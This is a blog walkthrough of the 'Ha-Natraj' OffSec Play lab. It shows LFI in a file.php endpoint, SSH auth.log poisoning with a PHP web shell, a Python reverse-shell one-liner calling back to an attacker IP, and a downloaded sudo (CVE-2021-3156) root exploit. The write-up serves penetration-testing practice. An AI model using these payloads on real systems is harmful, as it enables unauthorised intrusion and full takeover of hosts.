offsec

Ha-Natraj OffSec Walkthruogh

INFOXIDE
4 Min Read
Ha-Natraj OffSec Walkthruogh

Ha-Natraj OffSec Walkthruogh: Today we’re going to solve another boot2root challenge called “Ha-Natraj”. It’s available at OffSec Play for penetration testing practice. This lab is not difficult if we have the right basic knowledge to break the labs and are attentive to all the details we find during the reconnaissance. An LFI auth log poisoning exploit leads to a foothold on the machine with privilege escalation via apache2 services run as sudo.

Contents
Penetration Testing MethodologyEnumerationExploitingPrivilege Escalation (user)

Penetration Testing Methodology

Reconnaissance

  • Nmap

Enumeration

  • Dirb

Exploitation

  • RCE with LFI and SSH Log Poisoning

Privilege Escalation

  • Abuse of Apache configuration file permissions
  • Abusing SUDO
  • Capture the flag

Walkthrough

Reconnaissance

So, let’s start by listing all the TCP ports with nmap.

 nmap -sV -sC -p- 192.168.10.156
nmap

Enumeration

We started by visiting the web service (port 80), where we have found several pictures and information about the Natraj, we will check the source code and robots.txt, it seems that there is nothing useful. (or at least, for the moment). So let’s proceed further.

web page

With the help of Dirb and it’s default dictionary, we have found a directory called “console“.

console dir

We go in and list a file called “file.php“:

hidden dir

If we execute it, we see that it does nothing. We probably need to add something else 

files

Now I decided to use the same file name as the “GET” variable and try to do a proof of concept (POC) to check if the site was vulnerable to Local File Inclusion (LFI).

lfi

Exploiting

After examining I found that it was vulnerable and that the site was using an Apache server, I tried to perform an RCE (Remote Command Execution) by poisoning the Apache log, but I was not successful.

After further testing of other options, I saw that I do have the Access to the “auth.log” file, where SSH service logs appear.

Malicious sending:

log dir

Response from the server:

burp auth.log

After this, we can try writing PHP code inside the SSH command for the connection:

I connected to the port using Netcat and injected a PHP command.

sudo nc -nv 192.168.167.80 22
<?php system($_GET['cmd']); ?>

Now going back to the vulnerable URL endpoint we can see the injection showing in the logs and test it by passing the cmd parameter in the URL.

 http://192.168.167.80/console/file.php?file=/var/log/auth.log&cmd=id
logs

Since I was able to verify my PHP injection worked I aimed to get a reverse shell using Python. first i start natcat listner.

nc -lnvp 4444

then put python reverse shell in url after cmd=python3 -c ‘import socket, subprocess, os; s=socket.socket(); s.connect((“192.168.167.142”, 4444)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([“/bin/sh”, “-i”])’

then uts give back connection to our terminal

nc listner

Privilege Escalation (user)

Sudo –version

sudo version – 1.8.21p2 which is vuln

exploit -> https://github.com/worawit/CVE-2021-3156/blob/main/exploit_nss.py

simply download and start own python server

python3 -m http.server

Now visit web browser 192.168.167.142:8000/exploit_nss.py copy this and back to the target system make sure you upload or download this exploit on /tmp dir

$ cd /tmp
$ wget 192.168.167.142:8000/exploit_nss.py
$ chmod +x exploit_nss.py
$ python3 exploit_nss.py
# cd /root
# ls
# proof.txt

finally this lab solve see you on next lab 😉

Also Read | PyExp OffSec Walkthrough

TAGGED:
Share This Article
Previous Article PyExp OffSec Walkthrough PyExp OffSec Walkthrough
Next Article Solstice OffSec Walkthrough Solstice OffSec Walkthrough
Infoxide Security Live Hacking Workshop
Infoxide Security Certifications
infoxide Security telegram channel

Trending News🔥